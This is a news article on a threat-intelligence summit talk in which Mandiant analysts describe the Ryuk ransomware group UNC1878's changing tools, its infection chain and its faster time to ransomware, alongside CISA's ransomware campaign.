After undergoing a period of silence during the spring last year, the Ryuk ransomware strain reemerged in the fall — just to quiet down again in November.
The perceived silence in November from threat group UNC1878 was veiled by a pivot in activity, according to Aaron Stephens, senior threat analyst at Mandiant, during the SANS Institute Cyber Threat Intelligence Summit Thursday. FireEye's Mandiant uses "UNC" as shorthand for "uncategorized" for tracking similar activity clusters rather than the advanced persistent threat (APT) designation.
Mandiant believes some of the changes were made in reaction to Microsoft disrupting Trickbot's operations in October. While the mission was successful, though admittedly ongoing, it forced Trickbot users to outgrow the botnet and move to Kegtap.
"It was easier to rationalize the switch from Trickbot to Kegtap because of the extended break," said Stephens, referring to UNC1878's months-long hiatus. But then, actors quickly turned away from Kegtap, which "seems odd, especially with all of the success that they had in September and October."
Ransomware groups are resilient because the actors behind them quickly adapt. Their ability to switch means every type of business should remain aware of leading group's ever-evolving tactics, techniques and procedures (TTPs).
Simple changes, such as recycling malware or tweaking operations, can change how experts view and defend their organizations.
Companies have to "think about what's happening below the radar. There [are] folks that are hitting you every single day," namely ransomware, said Chris Krebs, former director of the Cybersecurity & Infrastructure Security Agency (CISA), during the summit.
It's not all ransomware
Ransomware actors are becoming more and more savvy, suggesting that a single organization's ability to defend an attack is impossible.
CISA's focus on ransomware was forced because "we're on the verge, as I see it, of a national emergency, if we're not already there," said Krebs. "The death of 1,000 cuts that ransomware actors are lobbying against us" is unrelenting, said Krebs.
On Jan. 21, CISA announced its "Reduce the Risk of Ransomware Campaign," calling on private sector coordination with the federal government for support. The campaign has a "particular focus" on COVID-19 response.
In the ransomware alert issued in late October, CISA warned of Ryuk and Conti strains. However, Mandiant has only observed UNC1878 using Conti in one instance. "Just like with Ryuk, we have to separate the malware from the threat actor," said Stephens.
Threat actors toy with tools, sometimes to test permanent solutions or to use different malware for varying end goals. In the instance UNC1878 used Conti, the group committed data theft and extortion. Historically, UNC1878's mission, while financially motivated, is geared at reaping chaos for the victim.
UNC1878 prefers deploying Ryuk by "iterating through hosts listed in text files on the shared drive," said Stephens. But UNC1878's toolkit is vast. "We think UNC1878 can best be summarized with two words: speed and scale," he said.
UNC1878 powered more than 90% of Ryuk-related ransomware attacks, according to Mandiant research. But "not every UNC1878 intrusion ends in ransomware. In fact, most don't," said Stephens. Less than 40% of the threat group's intrusions escalated to deploying Ryuk in 2020.
But that doesn't mean the group is giving up on the ransomware strain. In fact, it's improving it.
Since October, UNC1878 increased its "time to ransomware" from five days and 17 hours to four days and seven hours.
"UNC1878 continues to be a dominant player in the ransomware game, and their operational tempo only appears to be getting faster," said Stephens. "Regardless of what your business does, ransomware is in your threat model."
Ryuk's new moves
While investigating phishing email in November, Mandiant dove into a malicious PDF file disguised as a customer complaint. It was JavaScript, but "really gross JavaScript too, way grosser than normal," said Stephens. The code ran PowerShell and by decoding Base64, it made a git request for the URL. "So we're off to get this PHP, and fool me twice, it's PowerShell again," said Stephens.
The delivery method changed, but the progression led researchers back to UNC1878 as the signed certificates on the command and control (C2) uncovered in the fall. The group has a "penchant for offensive security frameworks," including PowerShell Empire, Cobalt Strike and Metasploit, said Van Ta, senior threat analyst at Mandiant, during the summit. Cobalt Strike was leveraged in almost 90% of UNC1878 intrusions since 2019.
"We have seen some sort of offensive security tooling and every single UNC1878 intrusion," said Ta. Since October, the group has adopted the Covenant framework. In one case, UNC1878 deviated from typical ploys to rely on a Covenant Grunt Stager following the initial Kegtap infection, and then an interactive redeployment.
The use of Covenant, by any of Mandiant's UNC groups, is approaching "shiny Pokemon levels of rarity," said Ta. As of right now, researchers aren't convinced Covenant is a permanent pivot by UNC1878, as much as it was an experiment.
Another new tool UNC1878 is testing is Grimagent, found in a customer's systems in October. The backdoor uses a combination of asymmetric encryption for the initial beacon and symmetric encryption for the commands in C2 communications.
The investigation of the customer with Grimagent was in response to a UNC1878 Ryuk ransomware attack. "The timeline proximity between UNC1878 and Grimagent on the system was tight, within minutes," said Ta. Additional activity supported UNC1878's historical lifecycle.
The initial detection of Grimagent led researchers to consider it was related to UNC2053's ecosystem, a group that also uses Kegtap. Reusing certifications in different malware "suggests some sort of relationship between UNC1878 and UNC2053 tooling, and thus, we need to be especially careful with how we assess the samples from an attribution standpoint," said Ta.
